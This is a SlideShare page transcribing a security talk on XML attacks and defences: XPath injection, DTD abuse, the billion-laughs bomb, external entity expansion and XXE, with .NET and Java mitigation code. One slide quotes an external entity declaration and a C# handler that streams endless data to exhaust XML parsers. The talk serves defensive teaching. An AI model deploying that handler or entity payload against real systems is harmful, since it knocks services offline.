Devouring Security XML Attack surface and Defences

4,563 views

Published on

Agenda:



· XML today

· XML/XPath injection - Demo

· Compiled XPath queries

· DTD use and abuse

- document validations

- entity expansions

- denial of service - Demo

- arbitrary uri access (egress)

- parameters

- file enumeration and theft - Demo

- CSRF on internal systems - Demo?

· Framework defaults limits/restrictions

· Mitigations

· Lessons learned

· Verifying your XML systems for potential threats





Note:

1. All of them inclusive of sample code for exploits and prevention. Language(C#, Java, php)/Platform(Windows/Linux) agnostic wherever possible.

2. It is imperative at this juncture, that you are aware of most attack scenarios against XML, because the framework defaults may not protect you, hence you may be vulnerable, you might have not found it yet.

3. The session is a bit biased towards DTD abuse in XML systems, as the Injection concepts and remediation remain common in XML when compared to Sql injection.

Published in: Software, Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
4,563
On SlideShare
0
From Embeds
0
Number of Embeds
1,251
Actions
Shares
0
Downloads
35
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Devouring Security XML Attack surface and Defences

  1. 1. Devouring Security Marudhamaran Gunasekaran XML Attack surface and Defences Watch the screen recording of the presentation at - http://vimeo.com/94209532
  2. 2. Overreacting to Risk I understand the natural human disgust reaction, but do these people actually think that their normal drinking water is any more pure? That a single human is that much worse than all the normal birds and other animals? A few ounces distributed amongst 38 million gallons is negligible. - Bruce Schneier https://www.schneier.com/blog/archives/2014/04/overreacting_to_1.html
  3. 3. Disclaimer Techniques and Tools in this presentation should be used or applied on an application, only with prior consent of the application’s owner. Illegal otherwise.
  4. 4. Xml today • Network protocols – SOAP, XMLRPC, REST • Data exchange – modern databases • Configuration files – java beans, .net config .. • Document/image formats – SVG, RSS, Atom
  5. 5. Xml injection demo http://XmlAttacks:8080/WebGoat/attack
  6. 6. Xpath Injection Anatomy
  7. 7. Blind Xpath Injection exists as well https://www.owasp.org/index.php/Blind_XPath_Injection http://dl.packetstormsecurity.net/papers/bypass/Blind_XPath_Injection_20040518.pdf More:
  8. 8. Mitigations •Rejecting requests based on Xpath < > / ' = “ •Variables with Xslttransformation •Linq to Xml without Xpath queries (.Net) •Xquery implementations (Saxon parser for Java & .Net)
  9. 9. Java Xpath injection mitigation with XPathVariableResolver (Java) Rejecting requests based on Xpath < > / ' = “ Variables with Xslttransformation Linq to Xml without Xpath queries (.Net) Xquery implementations (Saxon parser for Java & .Net)
  10. 10. Java Xpath injection mitigation with XPathVariableResolver (Java) Xpath with Variables
  11. 11. Java Xpath injection mitigation with IXsltContextVariable (.Net) Xpath with Variables
  12. 12. Java Xpath injection mitigation with IXsltContextVariable (.Net) Xpath with Variables
  13. 13. Xpath injection mitigation with Input filtering
  14. 14. Xpath injection mitigation with Linq to Xml (.Net) Linq to Xml: Xpath injection vulnerable Linq to Xml: Xpath injection proof
  15. 15. DTDs • Document Type Definition
  16. 16. Document Type Definition
  17. 17. Entity Declarations http://www.xmlmaster.org/en/article/d01/c03/
  18. 18. Billion Laughs (aka Xml Bomb) http://en.wikipedia.org/wiki/Billion_laughs
  19. 19. Billion Laughs (Demo)
  20. 20. External Entity Expansions http://msdn.microsoft.com/en-us/magazine/ee335713.aspx <!ENTITY stockprice SYSTEM "http://www.contoso.com/currentstockprice.ashx"> public class DoS : IHttpHandler { public void ProcessRequest(HttpContext context) { context.Response.ContentType = "text/plain"; byte[] data = new byte[1000000]; for (int i = 0; i < data.Length; i++) { data[i] = (byte)'A'; } while (true) { context.Response.OutputStream.Write(data, 0, data.Length); context.Response.Flush(); } } public bool IsReusable { get { return false; } } }
  21. 21. External Entity expansion mitigation (.Net) XmlDocument xmlDoc = new XmlDocument(); XmlTextReader reader = new XmlTextReader(new MemoryStream(Encoding.UTF8.GetBytes(xmlInput))); reader.ProhibitDtd = true; Mitigated: Potentially Vulnerable: XmlDocument xmlDoc = new XmlDocument(); xmlDoc.LoadXml(xmlInput);
  22. 22. External Entity expansion mitigation (JAXP)
  23. 23. Directory browsing and file access (JAXB) import javax.xml.bind.*; import javax.xml.stream.*; import javax.xml.transform.stream.StreamSource; public class Demo { public static void main(String[] args) throws Exception { JAXBContext jc = JAXBContext.newInstance(Customer.class); XMLInputFactory xif = XMLInputFactory.newFactory(); xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); xif.setProperty(XMLInputFactory.SUPPORT_DTD, false); XMLStreamReader xsr = xif.createXMLStreamReader(new StreamSource("src/xxe/input.xml")); Unmarshaller unmarshaller = jc.createUnmarshaller(); Customer customer = (Customer) unmarshaller.unmarshal(xsr); Marshaller marshaller = jc.createMarshaller(); marshaller.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, true); marshaller.marshal(customer, System.out); } } More: http://stackoverflow.com/questions/12977299/preven-xxe-attack-with-jaxb
  24. 24. DOS attack and safe/vulnerable .Net versions .Net framework 2.0.50727.5477 or higher .Net framework 4.0.30319.34011 or higher .Net framework 2.0.50727.5420 or lower .Net framework 4.0.30319.1 or lower .Net framework 2.0 - Revision 5420 to 5476 -- Safe/Vulnerable? .Net framework 4.0 - Revision 1 to 34010 -- Safe/Vulnerable?
  25. 25. Lessons learned 1. Keeping your operating systems and frameworks up to date 2. Don’t let your server headers reveal too much information 3. Be vigilant about the framework’s default settings
  26. 26. References / Further reading • http://www.lynda.com/XML-tutorials/Understanding-XML-usage-today/782/47912-4.html • http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3925 • http://secpod.org/blog/?p=1337 • http://2013.appsecusa.org/2013/wp- content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf • https://www.owasp.org/index.php/XPATH_Injection_Java • https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=61407250 • http://www.xmlmaster.org/en/article/d01/c03/

×